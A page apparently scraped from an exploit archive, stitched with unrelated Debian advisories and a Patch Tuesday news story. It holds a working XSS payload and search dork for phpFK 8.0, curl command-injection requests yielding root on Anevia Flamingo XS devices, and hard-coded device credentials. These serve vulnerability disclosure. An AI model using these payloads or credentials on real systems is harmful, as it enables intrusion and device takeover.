phpFK version 8.0 suffers from a cross site scripting vulnerability.

**phpFK 8.0 Cross Site Scripting**

Posted Jun 15, 2023

Authored by indoushka

phpFK version 8.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 485c60ad53bb4abb98ff8bd8586f25cee5d5a57abf5f55c1615b45b7b607c8e0

Download | Favorite | View

**phpFK 8.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : phpFK v8.0 version XSS Vulnerability                                                                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit)                                               | | # Vendor    : https://www.frank-karau.de/demo-forum/                                                                             |  | # Dork      : Powered by: phpFK                                                                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /forum/thread.php?board=4&thema=349'"><svg/onload=prompt(/_indoushka_/);>{{7*7}}[+] http://127.0.0.1/forum/thread.php?board=4&thema=349%27%22%3E%3Csvg/onload=prompt(/_indoushka_/);%3E{{7*7}}Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,379)
*   Arbitrary (16,086)
*   BBS (2,859)
*   Bypass (1,697)
*   CGI (1,024)
*   Code Execution (7,179)
*   Conference (678)
*   Cracker (841)
*   CSRF (3,321)
*   DoS (23,204)
*   Encryption (2,363)
*   Exploit (51,247)
*   File Inclusion (4,196)
*   File Upload (956)
*   Firewall (821)
*   Info Disclosure (2,722)
*   Intrusion Detection (885)
*   Java (3,003)
*   JavaScript (842)
*   Kernel (6,586)
*   Local (14,394)
*   Magazine (586)
*   Overflow (12,621)
*   Perl (1,423)
*   PHP (5,129)
*   Proof of Concept (2,335)
*   Protocol (3,567)
*   Python (1,510)
*   Remote (30,539)
*   Root (3,567)
*   Rootkit (506)
*   Ruby (609)
*   Scanner (1,633)
*   Security Tool (7,856)
*   Shell (3,165)
*   Shellcode (1,211)
*   Sniffer (893)
*   Spoof (2,189)
*   SQL Injection (16,237)
*   TCP (2,395)
*   Trojan (687)
*   UDP (884)
*   Virus (664)
*   Vulnerability (31,601)
*   Web (9,579)
*   Whitepaper (3,745)
*   x86 (961)
*   XSS (17,701)
*   Other

**File Archives**

*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,980)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,921)
*   Debian (6,762)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (345)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (45,894)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (482)
*   RedHat (13,380)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,666)
*   UNIX (9,249)
*   UnixWare (186)
*   Windows (6,558)
*   Other

phpFK 8.0 Cross Site Scripting

Microsoft has rolled out fixes for its Windows operating system and other software components to remediate major security shortcomings as part of Patch Tuesday updates for June 2023.
Of the 73 flaws, six are rated Critical, 63 are rated Important, two are rated Moderated, and one is rated Low in severity. This also includes three issues the tech giant addressed in its Chromium-based Edge browser

Patch Tuesday / Vulnerability

Microsoft has rolled out fixes for its Windows operating system and other software components to remediate major security shortcomings as part of Patch Tuesday updates for June 2023.

Of the 73 flaws, six are rated Critical, 63 are rated Important, two are rated Moderated, and one is rated Low in severity. This also includes three issues the tech giant addressed in its Chromium-based Edge browser.

It's worth noting that Microsoft also closed out 26 other flaws in Edge – all of them rooted in Chromium itself – since the release of May Patch Tuesday updates. This comprises CVE-2023-3079, a zero-day bug that Google disclosed as being actively exploited in the wild last week.

The June 2023 updates also mark the first time in several months that doesn't feature any zero-day flaw in Microsoft products that's publicly known or under active attack at the time of release.

Topping the list of fixes is CVE-2023-29357 (CVSS score: 9.8), a privilege escalation flaw in SharePoint Server that could be exploited by an attacker to gain administrator privileges.

"An attacker who has gained access to spoofed JWT authentication tokens can use them to execute a network attack which bypasses authentication and allows them to gain access to the privileges of an authenticated user," Microsoft said. "The attacker needs no privileges nor does the user need to perform any action."

Also patched by Redmond are three critical remote code execution bugs (CVE-2023-29363, CVE-2023-32014, and CVE-2023-32015, CVSS scores: 9.8) in Windows Pragmatic General Multicast (PGM) that could be weaponized to "achieve remote code execution and attempt to trigger malicious code."

Microsoft previously addressed a similar flaw in the same component (CVE-2023-28250, CVSS score: 9.8), a protocol designed to deliver packets between multiple network members in a reliable manner, in April 2023.

UPCOMING WEBINAR

🔐 Mastering API Security: Understanding Your True Attack Surface

Discover the untapped vulnerabilities in your API ecosystem and take proactive steps towards ironclad security. Join our insightful webinar!

Join the Session

Also resolved by the tech giant are two remote code execution bugs impacting Exchange Server (CVE-2023-28310 and CVE-2023-32031) that could permit an authenticated attacker to achieve remote code execution on affected installations.

**Software Patches from Other Vendors**

In addition to Microsoft, security updates have also been released by other vendors over the past few weeks to rectify several vulnerabilities, including —

*   Adobe
*   Android
*   Arm
*   Cisco
*   Citrix
*   Dell
*   Drupal
*   F5
*   Fortinet
*   GitLab
*   Google Chrome
*   Hitachi Energy
*   HP
*   IBM
*   Lenovo
*   Linux distributions Debian, Oracle Linux, Red Hat, SUSE, and Ubuntu
*   MediaTek
*   Mitsubishi Electric
*   MOVEit Transfer
*   Mozilla Firefox, Firefox ESR, and Thunderbird
*   NETGEAR
*   Qualcomm
*   Samsung
*   SAP
*   Schneider Electric
*   Siemens
*   Splunk
*   Synology
*   Trend Micro
*   Veritas
*   VMware
*   WordPress
*   Zoom, and
*   Zyxel

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Releases Updates to Patch Critical Flaws in Windows and Other Software

Debian Linux Security Advisory 5426-1 - An arbitrary file reads from malformed XML payload vulnerability was discovered in owslib, the Python client library for Open Geospatial (OGC) web services. This issue has been addressed by always using lxml as the XML parser with entity resolution disabled.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5426-1                   security@debian.orghttps://www.debian.org/security/                                  Aron XuJune 14, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : owslibCVE ID         : CVE-2023-27476Debian Bug     : 1034182An arbitrary file reads from malformed XML payload vulnerbility wasdiscovered in owslib, the Python client library for Open Geospatial (OGC)web services. This issue has been addressed by always using lxml as theXML parser with entity resolution disabled.For the oldstable distribution (bullseye), this problem has been fixedin version 0.23.0-1+deb11u1.We recommend that you upgrade your owslib packages.For the detailed security status of owslib please refer toits security tracker page at:https://security-tracker.debian.org/tracker/owslibFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQEzBAEBCAAdFiEEhhz+aYQl/Bp4OTA7O1LKKgqv2VQFAmSJH/AACgkQO1LKKgqv2VQBugf9EQeMoKzsAYfAG6NTgqF9hu5+SMNAlv2IsHzTJZwL8nOpXXhBDq6h2kvYwIScctrpjlJCOulvsYptnVS7hzHt/KqUSXzTap7fg4JxWkpaOylvcLvIwcbPbKSY7KzpWk1mdvePj+ktFaFx/IGKzCD95FGZhMqBhHJc8yPWoZUG3zaL2E8X99gBOVdjFHz6OIhjChaDTGfMr8sV7EpNR5YshFVSeTamysyIGxZe41KWg5mxbnFO8BpIZHWl9Tuz64xhp/QO9SjCDBWbd8zOuoouvaEtXgf8MyJjvPZkTX5PMIFvIVkKP3NHBnH6MUo1mXDUIA7PStjost53yEkU7caRWQ==DwF9-----END PGP SIGNATURE-----

Debian Security Advisory 5426-1

Debian Linux Security Advisory 5425-1 - It was discovered that PHP's implementation of SOAP HTTP Digest authentication performed insufficient error validation, which may result in a stack information leak or use of weak randomness.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5425-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJune 13, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : php8.2CVE ID         : not yet availableIt was discovered that PHP's implementation of SOAP HTTP Digestauthentication performed insufficient error validation, which may resultin a stack information leak or use of weak randomness.For the stable distribution (bookworm), this problem has been fixed inversion 8.2.7-1~deb12u1.We recommend that you upgrade your php8.2 packages.For the detailed security status of php8.2 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/php8.2Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmSIy9sACgkQEMKTtsN8TjbZKxAAkxlsoOX/Gqfw5W0hKEFjJ0CYIxk4ghwg1N+o4e9Ko7BoVIFnFeVB4dTes0DIbGpp8nBpsh5ynQ6iZePQyD3qI0BTS9TCEAuzVQTq9gcWW6m2I9YxSlWDv2uhHTuwFv/V0Qa+j57v1Rbp2boF/D/Mygi3A4ctFI5KveFejSPuPYSlZTijFjWMD0jL8ledgP3Gzu4p/c+tHwapkgBsFj2LmyHVAodnTm0YngYEd82j78Ez2qoyUVyNBfSfv0YcFBDEb+WTzZ6jCZTOTtMGtEknH3/G+DMr4P3/zzpp6iWYe/SlPI2tmeqY6/hGi8VBiKt1SSdlRKjkmLPR+FZy0GrDuuFU6xrrxLtlGpyaoXE5scF+yqbHgRJAIrPg+7THWQd9vYJDu5ZaBh/hsFvMRqsIGksGp9J5jqUjoEcpBuafrjrvYcKA2hyqvQLseUCZUXk/ZG9Osp0sZ2B29RQ3naTgE38kuyZ3V8ae+zlwdJRcewr5XVvPcTlDnLiIL/c9sH203fHe1iFwevNERrU9gdxYxqllsWL4CaOZW6M4Yfb5+Dd4ilmUkDr5US2wnuU57QbQHu9LSR1Sjav710gATpNL2JfyC+SlGgD96u6Zz4Cxo2alEpF/rW8jBg4gnbyWePRjTVuIadeopR67nwVhOJooz85oVN+NuN1WpGdJxYhhUNs=0RKf-----END PGP SIGNATURE-----

Debian Security Advisory 5425-1

Debian Linux Security Advisory 5424-1 - It was discovered that PHP's implementation of SOAP HTTP Digest authentication performed insufficient error validation, which may result in a stack information leak or use of weak randomness.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5424-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJune 13, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : php7.4CVE ID         : not yet availableIt was discovered that PHP's implementation of SOAP HTTP Digestauthentication performed insufficient error validation, which may resultin a stack information leak or use of weak randomness.For the oldstable distribution (bullseye), this problem has been fixedin version 7.4.33-1+deb11u4.We recommend that you upgrade your php7.4 packages.For the detailed security status of php7.4 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/php7.4Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmSIyvIACgkQEMKTtsN8TjYdURAAmtKmyN+UIZIfOHkrg4DxpNL2dwSBcUefcozb5CYvo8R0RQJt62Ce+aI+nP6UXn0GCTzepfzJPGHS93t4BPNvxIQmp8jlofkRX1/Lnrg3ndPPtop+eQhmwdOq65app3kj/sa7b6sZKbsgbvayHu5eo1pRO0DCFIdHamDVcW1RFzJSCNOpsk6L9LjFqvOss5I8WXzL3z2TVGb20rv5LG78/nfPNgLIr63faG7XA2hQgCkT1iIlY8qT1IOTyKHxMWEnDFxZnnHWOFV3DF8iPF8EjmBKDAaEWWwOeIkk5Kiu4Jj8RayC0Gs6KPA0OI0NJ1ejdvGDa1SbJOqvtX5QHzc+jqqrpKlmtc2zHLezH9YZW802jkMOvxI65zepbYRXMsIqmDi624v5eJQh6qytl9YeLAsoJZfHw6Ic4RmpYfE/bsibX+y98TnKbDeUbkAOtG7m6kDobYQ8FXiY/dGK0jWLkcMCbU9lP4onL7s3SshJJEKgeyE17av2LUSJrPszxcD6wKbUj8hchn0t6AKtAKPMk8YHPS5mnUVd2jkNzgAmu7PrWgtoK94dfby1SB62HN129+6GMO67VQhEHQjgsbubnYRYq92+qKpZ0bvq7Oq54G9XYcRzsoGCXkBhQnoqei8PSSKchWEd887q4sFxUmZYgqSN9xtNJSzOX/lv07bYNHM=4iUa-----END PGP SIGNATURE-----

Debian Security Advisory 5424-1

Anevia Flamingo XS version 3.6.5 suffers from an authenticated remote code execution vulnerability. A remote attacker can exploit this issue and execute arbitrary system commands granting her system access with root privileges.

    Anevia Flamingo XS 3.6.5 Authenticated Root Remote Code ExecutionVendor: AtemeProduct web page: https://www.ateme.comAffected version: 3.6.5                  Hardware revision: 1.1                  SoapLive 2.4.0                  SoapSystem 1.3.1Summary: Flamingo XL, a new modular and high-density IPTV head-endproduct for hospitality and corporate markets. Flamingo XL captureslive TV and radio content from satellite, cable, digital terrestrialand analog sources before streaming it over IP networks to STBs, PCsor other IP-connected devices. The Flamingo XL is based upon a modular4U rack hardware platform that allows hospitality and corporate videoservice providers to deliver a mix of channels from various sourcesover internal IP networks.Desc: The affected device suffers from authenticated remote codeexecution vulnerability. A remote attacker can exploit this issueand execute arbitrary system commands granting her system accesswith root privileges.Tested on: GNU/Linux 3.14.29 (x86_64)           Apache/2.2.22 (Debian)           PHP/5.6.0-0anevia2Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2023-5778Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5778.php13.04.2023--$ curl -sL "http://192.168.1.1/admin/time.php" -H "Cookie: PHPSESSID=o4pan20dtnfb239trffu06pid4" -d "ntp_hosts%5B%5D=&ntp_hosts%5B%5D=%60id%60&ntp_address=&update=Apply&request=ntp" |findstr www-data        <td>uid=33(www-data)</td>          <input type="hidden" name="ntp_hosts[]" value="uid=33(www-data)"/>        <td>gid=33(www-data)</td>          <input type="hidden" name="ntp_hosts[]" value="gid=33(www-data)"/>        <td>groups=33(www-data),6(disk),25(floppy)</td>          <input type="hidden" name="ntp_hosts[]" value="groups=33(www-data),6(disk),25(floppy)"/>---$ curl -sL "http://192.168.1.1/admin/time.php" -H "Cookie: PHPSESSID=o4pan20dtnfb239trffu06pid4" -d "ntp_hosts%5B%5D=&ntp_hosts%5B%5D=%60sudo%20id%60&ntp_address=&update=Apply&request=ntp" |findstr root        <td>uid=0(root)</td>          <input type="hidden" name="ntp_hosts[]" value="uid=0(root)"/>        <td>gid=0(root)</td>          <input type="hidden" name="ntp_hosts[]" value="gid=0(root)"/>        <td>groups=0(root)</td>          <input type="hidden" name="ntp_hosts[]" value="groups=0(root)"/>

Anevia Flamingo XS 3.6.5 Authenticated Root Remote Code Execution

Anevia Flamingo XL/XS versions 3.6.20 and 3.2.9 have a weak set of default and hardcoded administrative credentials that can be easily guessed in remote password attacks and gain full control of the system.

    Anevia Flamingo XL/XS 3.6.x Default/Hard-coded CredentialsVendor: AtemeProduct web page: https://www.ateme.comAffected version: 3.6.20, 3.2.9                  Hardware revision 1.1, 1.0                  SoapLive 2.4.1, 2.0.3                  SoapSystem 1.3.1Summary: Flamingo XL, a new modular and high-density IPTV head-endproduct for hospitality and corporate markets. Flamingo XL captureslive TV and radio content from satellite, cable, digital terrestrialand analog sources before streaming it over IP networks to STBs, PCsor other IP-connected devices. The Flamingo XL is based upon a modular4U rack hardware platform that allows hospitality and corporate videoservice providers to deliver a mix of channels from various sourcesover internal IP networks.Desc: The device uses a weak set of default and hard-coded administrativecredentials that can be easily guessed in remote password attacks andgain full control of the system.Tested on: GNU/Linux 3.14.29 (x86_64)           Apache/2.2.22 (Debian)           PHP/5.6.0Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2023-5777Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5777.php13.04.2023--SSH: root:aneviaSSH: enable:parisWEB: admin:parisWEB: monitor:aneviaOEM: monitor:aneviaOEM: monitor:telesteOEM: monitor:envivioOEM: monitor:blankom

Anevia Flamingo XL/XS 3.6.x Default / Hardcoded Credentials 

Debian Linux Security Advisory 5423-1 - Multiple security issues were discovered in Thunderbird, which could result in denial of service or the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5423-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
June 11, 2023                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : thunderbird  
CVE ID         : CVE-2023-34414 CVE-2023-34416

Multiple security issues were discovered in Thunderbird, which could  
result in denial of service or the execution of arbitrary code.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 1:102.12.0-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 1:102.12.0-1~deb12u1.

We recommend that you upgrade your thunderbird packages.

For the detailed security status of thunderbird please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/thunderbird

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmSF45EACgkQEMKTtsN8  
TjalIRAAhRakNkL1P0jBLo9V0zMwTBhplDx/IrO5jZt9WFbiWZHlCBYpz7gq8Ll3  
81HUj2oQz1b+ITXcDTof4WGuz0uweP5bdfTFE5jNBhmZFw/TQzkZnu8VV+38lhfU  
/kGWlk1srhmP7ZSPwLiRDMQmjWI9nwpnLHKR/JgPALuqDUo932ccDyVI1RK5wrpt  
HHNua6m/i7wC+WB7xZ59FME5BDSOe62a9PQALrJaX7VPL6/MnXKq40hIsx64NySA  
Xmd7lbxN/pBlamVFWuX7Y94QiYEGu12jNzlPaJv50xGD8O0shQ458wZWoa5RVi7L  
iUFw2u/CgUQPhMKGOaP9C/NpCTg6aWul6Og8dL54z3ZBXTPqtXw/UmxwNF4llW+d  
1Vf/HfPShE3uWxpa6kQ37XFk7N8kYDFv8jxFtTIYj+yglU8q3I/LCyPe8rYrzrzR  
WhFKgZRtyFPl294ymCmT7GLozEXLUR8VkbCmwZ3/jqgAD9ugK2yNDLnJ1xs/XAnR  
mWt8oARb4i/+WM4CO/ElX0Bzt4bzw9QzlMxj4axzmAw420YVpxR7XM6IFUj4lLFc  
1WSBTv+7kY/cJ8ZfPlMbnMnPCRSfcfGgqSOxeNqHkg2YyIHeC37q2zyOXoaDGSkl  
fTJoduWCy05pMhvOsqcK4OntkAM3NiCaT2TIhH6YJle5qF9TjgI=  
=tBGm  
-----END PGP SIGNATURE-----

Debian Security Advisory 5423-1

The affected device suffers from authenticated remote code execution vulnerability. A remote attacker can exploit this issue and execute arbitrary system commands granting her system access with root privileges. Also, the application suffers from Insufficient Session Expiration vulnerability.

Title: Anevia Flamingo XS 3.6.5 Authenticated Root Remote Code Execution  
Advisory ID: ZSL-2023-5778  
Type: Local/Remote  
Impact: System Access, DoS  
Risk: (4/5)  
Release Date: 11.06.2023

**Summary**

Flamingo XL, a new modular and high-density IPTV head-end product for hospitality and corporate markets. Flamingo XL captures live TV and radio content from satellite, cable, digital terrestrial and analog sources before streaming it over IP networks to STBs, PCs or other IP-connected devices. The Flamingo XL is based upon a modular 4U rack hardware platform that allows hospitality and corporate video service providers to deliver a mix of channels from various sources over internal IP networks.

**Description**

The affected device suffers from authenticated remote code execution vulnerability. A remote attacker can exploit this issue and execute arbitrary system commands granting her system access with root privileges. Also, the application suffers from Insufficient Session Expiration vulnerability.

**Vendor**

Ateme - https://www.ateme.com

**Affected Version**

3.6.5  
Hardware revision: 1.1  
SoapLive 2.4.0  
SoapSystem 1.3.1

**Tested On**

GNU/Linux 3.14.29 (x86\_64)  
Apache/2.2.22 (Debian)  
PHP/5.6.0-0anevia2

**Vendor Status**

\[13.04.2023\] Vulnerability discovered.  
\[13.04.2023\] Vendor contacted.  
\[10.06.2023\] No response from the vendor.  
\[11.06.2023\] Public security advisory released.

**PoC**

anevia\_rce.txt

**Credits**

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk\>

**References**

N/A

**Changelog**

\[11.06.2023\] - Initial release

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk  
e-mail: lab@zeroscience.mk

The device uses a weak set of default and hard-coded administrative credentials that can be easily guessed in remote password attacks and gain full control of the system.

Title: Anevia Flamingo XL/XS 3.6.x Default/Hard-coded Credentials  
Advisory ID: ZSL-2023-5777  
Type: Local/Remote  
Impact: Privilege Escalation, System Access, DoS  
Risk: (4/5)  
Release Date: 11.06.2023

**Summary**

Flamingo XL, a new modular and high-density IPTV head-end product for hospitality and corporate markets. Flamingo XL captures live TV and radio content from satellite, cable, digital terrestrial and analog sources before streaming it over IP networks to STBs, PCs or other IP-connected devices. The Flamingo XL is based upon a modular 4U rack hardware platform that allows hospitality and corporate video service providers to deliver a mix of channels from various sources over internal IP networks.

**Description**

The device uses a weak set of default and hard-coded administrative credentials that can be easily guessed in remote password attacks and gain full control of the system.

**Vendor**

Ateme - https://www.ateme.com

**Affected Version**

3.6.20, 3.2.9  
Hardware revision 1.1, 1.0  
SoapLive 2.4.1, 2.0.3  
SoapSystem 1.3.1

**Tested On**

GNU/Linux 3.14.29 (x86\_64)  
Apache/2.2.22 (Debian) PHP/5.6.0

**Vendor Status**

\[13.04.2023\] Vulnerability discovered.  
\[13.04.2023\] Vendor contacted.  
\[10.06.2023\] No response from the vendor.  
\[11.06.2023\] Public security advisory released.

**PoC**

anevia\_creds.txt

**Credits**

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk\>

**References**

N/A

**Changelog**

\[11.06.2023\] - Initial release

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk  
e-mail: lab@zeroscience.mk

Tag

#debian